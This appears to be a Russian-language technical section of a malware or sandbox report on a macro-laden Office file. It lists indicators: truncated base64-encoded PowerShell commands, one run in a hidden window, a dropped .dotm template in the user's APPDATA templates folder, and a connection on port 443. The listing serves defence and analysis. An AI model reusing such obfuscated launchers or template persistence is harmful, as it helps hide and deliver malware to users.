Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBWACAAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcARAAnACwAJwAzAHkAJwAsACcANgBlAFYAJwApACAAKAAgACAAWwB0AFkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAEYAIAAnAG4AJwAsACcAYwAn...
- %APPDATA%\microsoft\templates\1630506452.dotm
- %APPDATA%\microsoft\templates\~$30506452.dotm
- %APPDATA%\microsoft\templates\~$30506452.dotm
- %APPDATA%\microsoft\templates\~$30506452.dotm
- '<LOCALNET>.1.14':443
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBWACAAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcARAAnACwAJwAzAHkAJwAsACcANgBlAFYAJwApACAAKAAgACAAWwB0AFkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAEYAIAAnAG4AJwAsACcAYwAn...' (со скрытым окном)